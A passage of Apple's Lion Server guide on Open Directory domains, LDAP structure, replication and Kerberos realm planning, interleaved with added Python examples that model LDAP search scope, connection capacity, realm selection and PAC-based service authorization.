Open Directory makes it possible to consolidate and maintain network information easily in a directory domain, but this information has value only if application and system software processes running on network computers access it. Here are some ways in which Mac OS X Lion system and application software use directory data:

Login: Workgroup Manager can create user records in a directory domain, and these records can be used to authenticate users who log in to Mac and Windows computers. When a user specifies a name and a password in the login window, the login process asks Open Directory to authenticate the name and password. Open Directory uses the name to find the user's account record in a directory domain and uses other data in the user record to validate the password.
Folder and file access: After logging in, a user can access files and folders. Mac OS X Lion uses other data from the user record to determine the user's access privileges for each file or folder.
Home folders: Each user record in a directory domain stores the location of the user's home folder. This is where the user keeps personal files, folders, and preferences. A user's home folder can be located on a computer the user always uses or on a network file server.
Automount share points: Share points can be configured to automount (appear automatically) in the /Network folder (the Network globe) in the Finder windows of client computers. Information about these automount share points is stored in a directory domain. Share points are folders, disks, or disk partitions you make accessible over the network.
Mail account settings: Each user's record in a directory domain specifies whether the user has mail service, which mail protocols to use, how to present incoming mail, whether to alert the user when mail arrives, and so forth.
Resource usage: Disk, print, and mail quotas can be stored in each user record of a directory domain.
Managed client information: The administrator can manage the Mac OS X environment of users whose account records are stored in a directory domain. The administrator makes mandatory preference settings that are stored in the directory domain and override users' personal preferences.
Group management: In addition to user records, a directory domain also stores group records. Each group record affects all users who are in the group. Information in group records specifies preference settings for group members. Group records also determine access to files, folders, and computers.
Managed network views: The administrator can set up custom views that users see when they select the Network icon in the sidebar of a Finder window. Because these managed network views are stored in a directory domain, they're available when a user logs in.

Access to directory services
Open Directory can access directory domains for the following kinds of directory services:
Lightweight Directory Access Protocol (LDAP), an open standard common in mixed environments of Macintosh, UNIX, and Windows systems. LDAP is the native directory service for shared directories in Lion Server.
Local directory domain, the local directory service for Mac OS X and Mac OS X Server v10.6 or later.
Active Directory, the directory service of Microsoft Windows 2000 and 2003 servers and later.
Network Information System (NIS), the directory service of many UNIX servers. (NIS provides neither authentication nor encryption of directory traffic, so use it only on trusted networks.)
BSD flat files, the legacy directory service of UNIX systems.


Inside a directory domain


Information in a directory domain is organized by record type. Record types are specific categories of information such as users, groups, and computers. For each record type, a directory domain can contain any number of records. Each record is a collection of attributes, and each attribute has values. If you think of each record type as a spreadsheet that contains a category of information, records are like the rows of the spreadsheet, attributes are like the columns, and each cell contains values.

For example, when you define a user account by using Workgroup Manager, you are creating a user record (a record of the user record type). The settings you configure for the user account, such as short name, full name, and home folder location, become values of attributes in the user record. The user record and the values of its attributes reside in a directory domain.

In some directory services, such as LDAP and Active Directory, directory information is organized by object class. Like record types, object classes define categories of information. An object class defines similar information, named entries, by specifying the attributes that an entry must or may contain. For an object class, a directory domain can contain multiple entries, and each entry can contain multiple attributes. Some attributes have a single value, while others have multiple values. For example, the inetOrgPerson object class defines entries that contain user attributes. The inetOrgPerson class is a standard LDAP class defined by RFC 2798. Other standard LDAP object classes and attributes are defined by RFC 2307. Open Directory's default object classes and attributes are based on these RFCs.

A collection of attributes and record types or object classes provides a blueprint for the information in a directory domain. This blueprint is named the schema of the directory domain. Open Directory uses a directory-based schema rather than a schema stored in local configuration files. Maintaining a locally stored schema configuration file is complex: if you change or add an attribute in the local schema of an Open Directory master that serves replicas, you must also make that change on each replica. Depending on the number of replicas you have, the manual update process can take an enormous amount of time, and if you do not make the same schema change locally on each replica, the replicas generate errors and fail when values for the newly added attribute are sent to them. To eliminate this possibility of failure, Mac OS X Lion stores the schema in the directory database itself, so it is updated on each replica from the replicated directory database. This keeps the schema for replicas synchronized and provides greater flexibility to make schema changes.

About the structure of LDAP entries
In an LDAP directory, entries are arranged in a hierarchical treelike structure. In some LDAP directories, this structure is based on geographic and organizational boundaries. More commonly, the structure is based on Internet domain names. In a simple directory organization, entries representing users, groups, computers, and other object classes are immediately below the root level of the hierarchy, as shown here:

An entry is referenced by its distinguished name (DN), which is constructed by taking the name of the entry, referred to as the relative distinguished name (RDN), and concatenating the names of its ancestor entries. For example, the entry for Anne Johnson could have an RDN of uid=anne and a DN of uid=anne,cn=users,dc=example,dc=com.

The LDAP service retrieves data by searching the hierarchy of entries. The search can begin at any entry. The entry where the search begins is the search base. You designate a search base by specifying the distinguished name of an entry in the LDAP directory. For example, the search base cn=users,dc=example,dc=com specifies that the LDAP service begin searching at the entry whose cn attribute has the value users. You can also specify how much of the LDAP hierarchy to search below the search base. The search scope can include all subtrees below the search base or only the first level of entries below the search base. If you use command-line tools to search an LDAP directory, you can also restrict the search scope to the search base entry itself.
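The following is an added example, not code from the Lion Server guide, that models how a search base and scope select entries from a DN hierarchy of the kind described above. The sample entries are constructed (only the users container and uid=anne come from the text); DN parsing is deliberately simplified and does not handle escaped commas or multi-valued RDNs.

```python
# Added example (not code from the Lion Server guide): models how an LDAP
# search base and scope select entries from a DN hierarchy like the one
# described above. The sample entries are constructed; DN parsing is
# simplified (no escaped commas, no multi-valued RDNs), which is enough for
# the uid=anne,cn=users,dc=example,dc=com style of DN used here.

from typing import List

# Constructed directory: the users container and uid=anne follow the text;
# the other entries are invented to give the search something to skip.
SAMPLE_DNS = [
    "dc=example,dc=com",
    "cn=users,dc=example,dc=com",
    "uid=anne,cn=users,dc=example,dc=com",
    "uid=bob,cn=users,dc=example,dc=com",
    "cn=groups,dc=example,dc=com",
    "cn=staff,cn=groups,dc=example,dc=com",
    "cn=computers,dc=example,dc=com",
]


def parse_dn(dn: str) -> List[str]:
    """Split a DN into normalised RDNs, most specific first
    ("uid=anne,cn=users,dc=example,dc=com" -> ["uid=anne", "cn=users", ...])."""
    rdns = []
    for part in dn.split(","):
        attr, _, value = part.strip().partition("=")
        rdns.append(f"{attr.strip().lower()}={value.strip().lower()}")
    return rdns


def rdn_of(dn: str) -> str:
    """The entry's own name: the first (leftmost) RDN of its DN."""
    return parse_dn(dn)[0]


def depth_below(entry_dn: str, base_dn: str):
    """How many levels entry_dn sits below base_dn, or None if it is not
    within the subtree rooted at base_dn (ancestor RDNs must match exactly)."""
    entry, base = parse_dn(entry_dn), parse_dn(base_dn)
    if len(entry) < len(base) or entry[len(entry) - len(base):] != base:
        return None
    return len(entry) - len(base)


def in_scope(entry_dn: str, base_dn: str, scope: str) -> bool:
    """scope: "base" = the search base entry only, "one" = the first level
    below the base, "sub" = the base entry and every entry beneath it."""
    depth = depth_below(entry_dn, base_dn)
    if depth is None:
        return False
    if scope == "base":
        return depth == 0
    if scope == "one":
        return depth == 1
    if scope == "sub":
        return True
    raise ValueError(f"unknown scope {scope!r}")


def search(base_dn: str, scope: str, entries: List[str] = SAMPLE_DNS) -> List[str]:
    """Return the DNs of entries the LDAP service would visit for this base and scope."""
    return [dn for dn in entries if in_scope(dn, base_dn, scope)]


if __name__ == "__main__":
    for scope in ("base", "one", "sub"):
        print(scope, search("cn=users,dc=example,dc=com", scope))
```

With OpenLDAP's ldapsearch the same three searches are expressed as -b "cn=users,dc=example,dc=com" together with -s base, -s one, or -s sub; a search against a replica of a large domain should use the narrowest base and scope that still find the entry, since a subtree search from the root walks every entry.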


Local and shared directory domains


Where you store your server's user information and other administrative data is determined by whether the data must be shared. This information can be stored in the server's local directory domain or in a shared directory domain.

About the local directory domain
Every Mac computer has a local directory domain. A local directory domain's administrative data is visible only to applications and system software running on the computer where the domain resides. It is the first domain consulted when a user logs in or performs any operation that requires data stored in a directory domain. When the user logs in to a Mac, Open Directory searches the computer's local directory domain for the user's record. If the local directory domain contains the user's record (and if the user entered the correct password), the login process proceeds and the user gets access to the computer.

After login, the user could choose Connect to Server from the Go menu and connect to a Mac server for file service. In this case, Open Directory on the server searches for the user's record in the server's local directory domain. If the server's local directory domain has a record for the user (and if the user enters the correct password), the server grants the user access to file services, as shown below:

When you set up a Mac, its local directory domain is created and populated with records. For example, a user record is created for the user who performed the installation. It contains the user name and password entered during setup and other information, such as a unique ID for the user and the location of the user's home folder.

About shared directory domains
Although Open Directory on any Mac can store administrative data in the computer's local directory domain, the real power of Open Directory is that it lets multiple Mac computers share administrative data by storing the data in shared directory domains. When a computer is configured to use a shared domain, administrative data in the shared domain is also visible to applications and system software running on that computer. If Open Directory does not find a user's record in the local directory domain of a Mac computer, Open Directory can search for the user's record in any shared domains the computer has access to. In the following example, the user can access both computers because the shared domain accessible from both computers contains a record for the user.

Shared domains generally reside on servers because directory domains store extremely important data, such as the data for authenticating users. Access to servers is usually tightly restricted to protect the data on them. In addition, directory data must always be available. Servers often have extra hardware features that enhance their reliability, and servers can be connected to uninterruptible power sources.

Shared data in existing directory domains
Some organizations, such as universities and worldwide corporations, maintain user information and other administrative data in directory domains on UNIX or Windows servers. Open Directory can search these non-Apple domains as well as shared Open Directory domains of Lion Server systems, as shown in the illustration below.

The order in which Mac OS X Lion searches directory domains is configurable. A search policy determines the order in which Mac OS X Lion searches directory domains. Search policies are explained in Open Directory search policies.

Guidelines and management

Open Directory planning


Keeping information in shared directory domains gives you more control over your network, gives more users access to the information, and makes it easier to maintain the information. The amount of control and convenience depends on the effort you put into planning shared domains. The goal of directory domain planning is to design the simplest arrangement of shared domains that gives your Mac users easy access to the network resources they need and that minimizes the time you spend maintaining user records and other administrative data.

Planning guidelines
If you do not share user and resource information among multiple Macs, very little directory domain planning is necessary, because everything can be accessed from a local directory domain. However, make sure that all individuals who use a Mac have user accounts on that computer. These user accounts reside in the local directory domain on the computer. In addition, everyone who needs to use a Mac server's file service, mail service, or other services that require authentication must have a user account in the server's local directory domain. With this arrangement, each user has two accounts, one for logging in to a computer and one for accessing services of a Mac server, as illustrated in the following figure.

In this figure, the user logs in to the local directory domain of the Mac and then uses a different account to log in to the local directory domain of the file server.

To share information among Mac computers and servers, you must set up at least one shared directory domain. With this arrangement, each user needs an account only in the shared directory domain. With this one account, the user can log in to Mac OS X Lion on any computer that is configured to access the shared directory domain, and can use the same account to access services of any Mac server that is configured to access the shared directory domain. When the user attempts to access the file service, the file server consults the shared directory domain to verify the user account. Because both the user's computer and the file server are connected to the shared directory domain, the single account in the shared domain grants access to the computer and to the file service without a local account on each computer.

The following figure illustrates a configuration with a shared directory domain. The figure shows a user logging in to a Mac using a shared directory domain account. The same shared directory domain account is then used to access a file service.

In many organizations, a single shared directory domain is adequate. It can handle hundreds of thousands of users and thousands of computers sharing the same resources, such as printer queues, share points for home directories, share points for applications, and share points for documents. Replicating the shared directory domain can increase the capacity or performance of the directory system by configuring multiple servers to handle the directory load for the network. Larger, more complex organizations can benefit from extra shared directory domains. The following figure shows how one such complex organization might organize its directory domains.

If you have a large organization and you want to increase the performance and capacity of your network directory domain, you can add multiple directory domains to your network. By using multiple directory domains you can also load-balance your corporate directory domain. There are different methods of configuring multiple directory domains; by analyzing your network topology you can determine the best method for your network. The following are optional configurations of multiple directory domains:

Open Directory with an existing domain. You can configure an Open Directory server on a network that has an existing directory domain such as an Active Directory or Open Directory domain. For example, if your organization has an existing Active Directory server that supports Windows and Mac client computers, you can add an Open Directory server to better support Mac users. The two servers can exist on the same network and provide redundant directory domains for Windows and Mac clients. You can also configure Lion Server to handle cross-domain authorization if a Kerberos realm exists. If you have an existing Active Directory server, you can connect an Open Directory server to it and easily add users from the Active Directory server into your Open Directory server. These users are referred to as augment users. For more information about augment records, see Integrate with existing directory domains. For more information about adding augments to user records, see User Management.

Open Directory master server with replicas. You can also create an Open Directory master server with replicas. The replica servers have a copy of the Open Directory master's directory domain for load balancing and redundancy.

For example, your organization could have an Open Directory master at your headquarters and place replicas of that server at each remote location. This prevents users at remote locations from experiencing delayed logins.

Cascading replication. You can also use cascading replication, where replicas of an Open Directory master have replicas of their own. A replica that is a direct member of the Open Directory master and has replicas is called a relay. For example, if your organization has 32 replicas and you must add another replica, you can reorganize your network topology and have your replicas become relays by adding replicas to a replica (or relay). Cascading replication load-balances the Open Directory master by minimizing the number of replicas it must directly manage.

Estimating directory and authentication requirements
In addition to considering how to distribute directory data among multiple domains, you must also consider the capacity of each directory domain. The size of your directory domain depends on your network requirements. One factor is the performance of the database that stores directory information. The LDAP directory domain of a Mac server uses the Berkeley DB database, which remains efficient with 200,000 records. A server hosting a directory domain of that size must have sufficient hard disk space to store all the records.

The number of connections a directory service can handle is harder to measure because directory service connections occur in the context of the connections of all services the server provides. With Lion Server, a server dedicated to Open Directory has a limit of 1,000 simultaneous client computer connections. The Open Directory server can provide LDAP and authentication services to more client computers than that, because not all computers need these services at the same time. Each computer connects to the LDAP directory for up to two minutes, and connections to the Open Directory Password Server are even briefer. Determining what the fraction is (the percentage of computers that make connections at the same time) can be difficult. For example, computers that have a single user who spends all day working on graphics files need Open Directory services relatively infrequently. In contrast, computers in a lab have many users logging in throughout the day, each with a different set of managed client preference settings, and these computers place a relatively high load on Open Directory services.

In general, you can correlate Open Directory usage with login and logout. These activities generally dominate directory and authentication services for any system. The more frequently users log in and out, the fewer computers an Open Directory server (or any directory and authentication server) can support. You need more Open Directory servers if users log in frequently. You can get by with fewer Open Directory servers if work sessions are long and login is infrequent.

Identifying servers for hosting shared domains
If you need more than one shared domain, identify the servers where the shared domains should reside. Shared domains affect many users, so they should reside on Mac servers that have the following characteristics:
Restricted physical access
Limited network access
High-availability technologies, such as uninterruptible power supplies
Select computers that are not replaced frequently and that have adequate capacity for expanding directory domains. Although you can move a shared domain after it is set up, it might be necessary to reconfigure the search policies of computers that connect to the shared domain so users can continue to log in.
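The following is an added example, not code from the Lion Server guide, that turns the capacity discussion above into a Little's-law estimate: expected simultaneous connections equal the login arrival rate multiplied by the time each connection is held. The 1,000-connection limit and the two-minute LDAP connection come from the text; the login rates for the two kinds of client, the target utilisation, and the machine counts are constructed assumptions.

```python
# Added example (not code from the Lion Server guide): a Little's-law estimate
# of simultaneous Open Directory connections, using the guide's figures of
# 1,000 simultaneous client connections per dedicated server and an LDAP
# connection held for up to two minutes. The login rates are constructed
# assumptions for the two kinds of client the text contrasts.

import math

CONNECTION_LIMIT = 1000          # simultaneous client connections per OD server (from the text)
LDAP_HOLD_MINUTES = 2.0          # worst-case time a client holds its LDAP connection (from the text)


def concurrent_connections(machines: int, logins_per_hour_per_machine: float,
                           hold_minutes: float = LDAP_HOLD_MINUTES) -> float:
    """Expected simultaneous connections = arrival rate x hold time (Little's law).
    Use the busiest-hour login rate, not the daily average, to size for peaks."""
    arrivals_per_minute = machines * logins_per_hour_per_machine / 60.0
    return arrivals_per_minute * hold_minutes


def servers_needed(machines: int, logins_per_hour_per_machine: float,
                   target_utilisation: float = 0.5) -> int:
    """Open Directory servers (master plus replicas) needed so that the peak
    load stays at or below target_utilisation of each server's connection
    limit; the 50% default (an assumption) leaves room for a failed replica."""
    peak = concurrent_connections(machines, logins_per_hour_per_machine)
    return max(1, math.ceil(peak / (CONNECTION_LIMIT * target_utilisation)))


# Constructed scenarios: graphics workstations with one login per hour at
# peak, and lab machines where a class of users logs in ten times an hour.
SCENARIOS = {
    "graphics workstations": (3000, 1.0),
    "lab machines": (6000, 10.0),
}

if __name__ == "__main__":
    for name, (machines, rate) in SCENARIOS.items():
        print(name, round(concurrent_connections(machines, rate)),
              servers_needed(machines, rate))
```

The model deliberately uses the worst-case two-minute hold time for every login; measuring the real connection duration on a master (or lowering hold_minutes for the briefer Password Server connections) gives a tighter estimate, but the worst case is the right starting point when a directory outage blocks every login.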


Replicate Open Directory services


Lion Server supports replication of the LDAP directory service, the Open Directory Password Server, and the Kerberos KDC. By replicating your directory and authentication services you can:
Move directory information closer to a population of users in a geographically distributed network, improving performance of directory and authentication services to these users.
Achieve redundancy, so users see little disruption in service if a directory system fails or becomes unreachable.

One server has the primary copy of the shared LDAP directory domain, Open Directory Password Server, and Kerberos KDC. This server is referred to as an Open Directory master. Each Open Directory replica is a separate server with a copy of the master's LDAP directory, Open Directory Password Server, and Kerberos KDC. An Open Directory master can have up to 32 replicas, and each replica can have 32 replicas of its own, providing up to 1,056 replicas in a two-tier hierarchy.

Access to the LDAP directory on a replica is read only. Changes to user records and other account information in the LDAP directory can be made only on the Open Directory master. The Open Directory master updates its replicas when there are changes to the LDAP directory. The master can update replicas every time a change occurs, or you can set up a schedule so updates occur at regular intervals. The fixed schedule option is best if replicas are connected to the master by a slow network link.

Passwords and password policies can be changed on any replica. If a user's password or password policy is changed on more than one replica, the most recent change prevails.

Updating replicas relies on the clocks of the master and replicas being in sync. If replicas and the master have different times, "most recent" loses its meaning and updates could be applied in an unpredictable order. The date, time, and time zone information must be correct on the master and replicas, and they should use the same network time service to keep their clocks in sync. (Kerberos also rejects tickets when the clock skew between a client and the KDC exceeds the permitted limit, so accurate time matters for authentication as well as for replication.)

Avoid having only one replica on either side of a slow network link. If a replica is separated from other replicas by a slow network link and that one replica fails, its clients fail over to a replica on the other side of the slow link, and their directory services can slow markedly.

If your network has a mix of Mac OS X Server v10.6 and Lion Server, one version can't be a replica of a master of the other version. An Open Directory master of Lion Server won't replicate to v10.6, nor will an Open Directory master of v10.6 replicate to Lion Server:
Master version                  Lion Server replica   Mac OS X Server v10.6 replica
Lion Server master              Yes                   No
Mac OS X Server v10.6 master    No                    Yes

Replica sets
A replica set is an automatic configuration that requires each service that Open Directory manages (LDAP, Password Server, and Kerberos) to look for and use the same replica server. This helps ensure that client computers choose the same replica server when using Open Directory services and helps prevent slow login.

Cascading replication
Mac OS X Server v10.4 used a hub-spoke model for replicating Open Directory master servers. This required each Open Directory master to maintain a transaction record for each replica server. The following illustration shows the hub-spoke model used in Mac OS X Server v10.4.

In addition, there was no predefined limit to how many replica servers an Open Directory master could manage. If an Open Directory master had 1,000 replicas to manage, it could have performance issues as replicas continued to be added. This is similar to having one manager for 1,000 employees, which is an unmanageable situation. Mac OS X Server v10.5 and later use cascading replication to improve scalability and resolve the performance issues of the older hub-spoke model. Cascading replication limits the number of replicas a single Open Directory master must manage directly while increasing the total number of replicas it can support.

A single Open Directory master server can have up to 32 replicas and each replica can have up to 32 replicas, which gives you up to 1,056 replicas of a single Open Directory master server. This creates a two-tier hierarchy of replica servers. The first tier of replicas, which are the direct members of the Open Directory master, are called relays if they have replicas, because they relay the data to the second tier of replicas. Also, cascading replication does not require a single Open Directory master server to maintain a transaction record for every replica server. The master keeps a maximum of 32 replica transaction records, which improves performance. The following illustration shows the two-tier hierarchy of the cascading replication model.

Planning the upgrade of multiple Open Directory replicas
If your Open Directory master manages more than 32 replicas, your organization must migrate to cascading replication. The cascading replication model improves your Open Directory server performance. When planning your migration, consider the locations of your replica servers and your network topology to help determine how to reorganize your replicas into a hierarchical structure. For example, if your master and a group of replicas are on the West coast, do not feed those replicas through a relay on the East coast; group replicas under a relay in their own region.

Note: If your Open Directory master has 32 or fewer replicas, migration is not necessary.

Load balancing in small, medium, and large environments
Do not use service load-balancing software from third parties with Open Directory servers. Load-balancing software can cause unpredictable problems for Open Directory computers. It can interfere with the automatic load balancing and failover behavior of Open Directory in Mac OS X Lion and Lion Server. Mac computers seek the nearest available Open Directory server, master or replica. A computer's nearest Open Directory master or replica is the one that responds most quickly to the computer's request for an Open Directory connection.

Replication in a multibuilding campus
A network that spans multiple buildings might have slower network links between buildings than the link within each building. The network links between buildings might also be overloaded. These conditions can adversely affect the performance of computers that get Open Directory services from a server in another building. As a result, you may want to set up an Open Directory replica in each building. Depending on need, you may even want to set up an Open Directory replica on each floor of a multistory building. Each replica provides efficient directory and authentication services to client computers in its vicinity. The computers do not need to make connections with an Open Directory server across the slow, crowded network link between buildings.

Having more replicas has a disadvantage. Replicas communicate with each other and with the master over the network. This network communication overhead increases as you add replicas. Adding too many replicas can add more network traffic between buildings in the form of replication updates than it removes in the form of Open Directory client communications. When deciding how many replicas to deploy, consider how heavily the computers use Open Directory services. If the computers are relatively light users of Open Directory services and your buildings are connected by fairly fast network links (such as 100 Mbps Ethernet), you probably do not need a replica in each building. You can reduce the communication overhead between Open Directory replicas and the master by scheduling how often the Open Directory master updates the replicas. You might not need the replicas updated every time a change occurs on the master. Scheduling less frequent updates of replicas improves network performance.

Using an Open Directory master, replica, or relay with NAT If your network has an Open Directory server on the private network s ide of a network addres s translation (NAT) router (or gateway), including the NAT router of Mac server, only computers on the private network side of the NAT router can connect to the Open Directory servers LDAP directory domain. Computers on the public network side of the NAT router cant connect to the LDAP directory domain of an Open Directory master or replica thats on the private network side. If an Open Directory server is on the public network s ide of a NAT router, computers on the private network and the public network sides of the NAT router can connect to the Open Directory servers LDAP directory. If your network supports mobile clients such as MacBooks that move between the private LAN of your NAT gateway and the Internet, you can s et up VPN service for mobile users so they can use VPN to connect to the private network and the Open Directory domain. Open Directory master and replica compatibility The Open Directory master and its replicas must use the same version of Lion Server. In addition: An Open Directory master us ing Lion Server wont replicate to Mac OS X Server v10.6. Mac OS X Server v10.6 or later cant be a replica of an Open Directory mas ter us ing Lion Server. An Open Directory master us ing Lion Server can replicate to an Open Directory replica using Lion Server. If you have an Open Directory mas ter and replicas that use Mac OS X Server v10.6, upgrade them to Lion Server at the s ame time. Firs t, upgrade the master; then, upgrade the replicas. Clients of the mas ter and replicas continue to receive directory and authentication services during the upgrade. While you are upgrading the master, its clients fail over to the neares t replica. When you upgrade replicas one at a time, clients fail back to the upgraded master. 
Upgrading an Open Directory master from Mac OS X Server v10.6 or later severs ties to existing replicas. After upgrading each Open Directory replica to Lion Server, it is a standalone directory service and you must make it a replica again.

Mixing Active Directory and Open Directory master and replica services

There are some special considerations when introducing Open Directory servers into an Active Directory environment. If precautions are not taken, mixed results will occur on client and server functionality. Also, avoid mixing Authenticated Directory Binding and Active Directory on the same client or server. Authenticated binding makes use of Kerberos, as does Active Directory. Using both will cause unexpected behavior or nonfunctioning authentication services unless care is taken, as detailed below.

When mixing Open Directory and Active Directory, you can only use Kerberos credentials from one system or the other for single sign-on purposes. You cannot have users exist in Active Directory and Open Directory and use both Kerberos credentials to use single sign-on to access a server that is Kerberized. In other words, you cannot sign into an Active Directory account and expect to use single sign-on with a server that is part of the Open Directory Kerberos realm.

Kerberos is used in Active Directory and Open Directory environments. Kerberos makes assumptions about determining the realm of a server when Kerberos tickets are used. The following is an example of mixing an Active Directory Kerberos realm with an Open Directory master Kerberos realm:

Active Directory Domain = example.com
Active Directory Kerberos realm = EXAMPLE.COM
Open Directory Server master = server1.example.com
Open Directory Kerberos realm = SERVER1.EXAMPLE.COM

When Kerberos attempts to obtain a ticket-granting-ticket (TGT) for using LDAP with server1.example.com, it requests ldap/server1.example.com@EXAMPLE.COM unless the domain_realm entity is present in the configuration.
The domain_realm entity for Open Directory assumes that all example.com entities belong to SERVER1.EXAMPLE.COM. This prevents connectivity to the Active Directory domain named example.com.

To mix Authenticated Directory Binding and Active Directory, your Active Directory Domain and Open Directory realms and servers must be in a different hierarchy. For example:

Active Directory Domain = example.com
Active Directory Kerberos realm = EXAMPLE.COM
Open Directory Server master = server1.od.example.com
Open Directory Server realm = OD.EXAMPLE.COM

Or:

Active Directory Domain = ads.example.com
Active Directory Kerberos realm = ADS.EXAMPLE.COM
Open Directory Server master = server1.od.example.com
Open Directory Kerberos realm = OD.EXAMPLE.COM

In both examples, a new DNS domain zone must be created, and forward and reverse DNS entries must exist for the servers so that if an IP address is used for the Open Directory server, it gets the expected name. For example, IP address server1.od.example.com = 10.1.1.1, so a lookup of 10.1.1.1 should be equal to server1.od.example.com, not server1.example.com.
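The following is an added example, not code from the Lion Server guide, that makes the two realm layouts above concrete. It models the domain_realm lookup rule that MIT Kerberos clients apply (an exact hostname entry wins, then the longest matching ".suffix" entry, otherwise the realm is guessed by uppercasing the host's DNS domain), and it runs the forward/reverse DNS check the last paragraph asks for. The domain_realm tables, the host names (dc1.example.com stands in for an Active Directory domain controller), and the DNS records are all constructed for the example.

```python
"""Kerberos realm selection and DNS round-trip checks for the layouts above.

Added example, not code from the Lion Server guide. It models the MIT krb5
[domain_realm] lookup rule (exact host entry first, then the longest
matching ".suffix" entry, otherwise the realm is guessed by uppercasing the
host's DNS domain). All mapping tables and DNS records are constructed.
"""
from typing import Dict

# Constructed [domain_realm] contents. The first reflects the conflicting
# layout (master at server1.example.com mapping all of example.com to its
# realm); the second reflects the separated OD.EXAMPLE.COM hierarchy.
CONFLICTING_DOMAIN_REALM: Dict[str, str] = {
    "server1.example.com": "SERVER1.EXAMPLE.COM",
    ".example.com": "SERVER1.EXAMPLE.COM",
}
SEPARATED_DOMAIN_REALM: Dict[str, str] = {
    "server1.od.example.com": "OD.EXAMPLE.COM",
    ".od.example.com": "OD.EXAMPLE.COM",
}

# Constructed forward and reverse DNS records: a stale server1.example.com
# A record still resolves, but the PTR for 10.1.1.1 names the new host.
FORWARD: Dict[str, str] = {
    "server1.od.example.com": "10.1.1.1",
    "server1.example.com": "10.1.1.1",
}
REVERSE: Dict[str, str] = {"10.1.1.1": "server1.od.example.com"}


def realm_for_host(host: str, domain_realm: Dict[str, str]) -> str:
    """Return the realm a Kerberos client would pick for `host`."""
    host = host.lower().rstrip(".")
    if host in domain_realm:                 # exact hostname entry wins
        return domain_realm[host]
    labels = host.split(".")
    for i in range(1, len(labels)):          # ".od.example.com", ".example.com", ".com"
        suffix = "." + ".".join(labels[i:])
        if suffix in domain_realm:
            return domain_realm[suffix]
    return ".".join(labels[1:]).upper()      # no entry: guess from the DNS domain


def service_principal(service: str, host: str, domain_realm: Dict[str, str]) -> str:
    """Principal name the client asks the KDC for when contacting `service` on `host`."""
    return f"{service}/{host}@{realm_for_host(host, domain_realm)}"


def dns_round_trip_ok(host: str, forward: Dict[str, str], reverse: Dict[str, str]) -> bool:
    """True when host -> IP -> host comes back to the same fully qualified name."""
    name = host.lower().rstrip(".")
    ip = forward.get(name)
    return ip is not None and reverse.get(ip, "").lower() == name


if __name__ == "__main__":
    for table, label in ((CONFLICTING_DOMAIN_REALM, "conflicting"),
                         (SEPARATED_DOMAIN_REALM, "separated")):
        print(label, service_principal("ldap", "dc1.example.com", table))
    print("no mapping:", service_principal("ldap", "server1.example.com", {}))
    for name in FORWARD:
        ok = dns_round_trip_ok(name, FORWARD, REVERSE)
        print(name, "round trip ok" if ok else "MISMATCH")
```

With the conflicting table, a ticket request for the Active Directory controller dc1.example.com is sent to SERVER1.EXAMPLE.COM, which is the failure the text describes; with the separated table the same host falls through to EXAMPLE.COM and only hosts under od.example.com map to the Open Directory realm. The DNS check flags server1.example.com because its reverse record no longer matches.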

Lion Server user management

Open Directory services

Guidelines and management

Integrate with existing directory domains


If your network has a directory domain, you can integrate another directory domain server into your network. There are many reasons why you might want to have two directory domains, such as providing better support and management of network computers.

Integrating with cross-domain authorization

If your network has a directory domain, you can add another directory domain server to your network that uses your existing directory domain's database to authorize user access. This configuration is referred to as cross-domain authorization and requires that your servers support Kerberos.

If you use cross-domain authorization, one server is a pseudomaster server and the other is a subordinate server. Users authenticate to the pseudomaster server using a method of authentication, so if a user authenticates, he or she receives a Kerberos ticket. When the user attempts to access a service that is offered by the subordinate server, the subordinate server accepts and validates the user's Kerberos ticket, which was given by the pseudomaster server, to authorize the user.

The Kerberos ticket has Privilege Attribute Certificate (PAC) information, which contains the user name, user IDs (UIDs), and group membership IDs (GIDs). The subordinate server uses this information to verify that the user is authorized to use the service. It does so by comparing the UID or GID to the access control list (ACL) of the service the user is requesting to access.

Using cross-domain authorization keeps you from needing to create different user names and passwords for your subordinate directory domain server. You can use the same user names and passwords from the corporate directory domain along with the PAC information to authorize user access. Cross-domain authorization is an ideal configuration if you are not permitted to directly edit groups in the corporate directory domain.
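The following added example, not code from Lion Server, walks through the authorization decision just described from the subordinate server's side: accept only a ticket issued by the pseudomaster's realm, read the user name, UID, and GIDs from its PAC, and compare them with the requested service's ACL. The tickets, PAC fields, realm names, and the "afp" ACL are constructed, and the ticket validation is reduced to a realm and expiry check (a real server also verifies the KDC's signature over the ticket). The same allow-list comparison is what the service access control lists discussed later in this chapter perform for the login window and SSH.

```python
"""Subordinate-server authorization using PAC data from a trusted ticket.

Added example, not code from Lion Server. The subordinate server accepts a
Kerberos ticket issued by the pseudomaster's realm, reads the user name,
UID, and GIDs the PAC carries, and compares those IDs with the requested
service's access control list. Tickets and ACLs are constructed; signature
checking is reduced to a realm and expiry check.
"""
from dataclasses import dataclass, field
from typing import Dict, FrozenSet, Optional, Set, Tuple


@dataclass(frozen=True)
class Pac:
    """Privilege Attribute Certificate fields the guide mentions."""
    user: str
    uid: int
    gids: FrozenSet[int]


@dataclass
class ServiceAcl:
    """Allow-list for one service: a matching UID or any matching GID grants access."""
    service: str
    uids: Set[int] = field(default_factory=set)
    gids: Set[int] = field(default_factory=set)

    def authorizes(self, pac: Pac) -> bool:
        return pac.uid in self.uids or bool(self.gids & pac.gids)


def validate_ticket(ticket: Dict, trusted_realm: str) -> Optional[Pac]:
    """Accept only tickets from the pseudomaster's realm that have not expired."""
    if ticket.get("realm") != trusted_realm or ticket.get("expired", False):
        return None
    pac = ticket["pac"]
    return Pac(pac["user"], int(pac["uid"]), frozenset(int(g) for g in pac["gids"]))


def authorize(ticket: Dict, trusted_realm: str, acl: ServiceAcl) -> Tuple[bool, str]:
    """Decide whether the ticket holder may use `acl.service`, with a reason."""
    pac = validate_ticket(ticket, trusted_realm)
    if pac is None:
        return False, "ticket rejected: not from the trusted realm or expired"
    if acl.authorizes(pac):
        return True, f"{pac.user} (uid {pac.uid}) allowed on {acl.service}"
    return False, f"{pac.user} (uid {pac.uid}) is not in the {acl.service} ACL"


# Constructed data: the pseudomaster realm, two tickets it issued, one ticket
# from an unrelated realm, and an ACL for a file service on the subordinate.
PSEUDOMASTER_REALM = "EXAMPLE.COM"
AFP_ACL = ServiceAcl("afp", uids={1001}, gids={1300})
ALICE = {"realm": "EXAMPLE.COM", "expired": False,
         "pac": {"user": "alice", "uid": 1205, "gids": [20, 1300]}}
BOB = {"realm": "EXAMPLE.COM", "expired": False,
       "pac": {"user": "bob", "uid": 1206, "gids": [20, 1400]}}
CAROL = {"realm": "PARTNER.EXAMPLE.COM", "expired": False,
         "pac": {"user": "carol", "uid": 1001, "gids": [1300]}}

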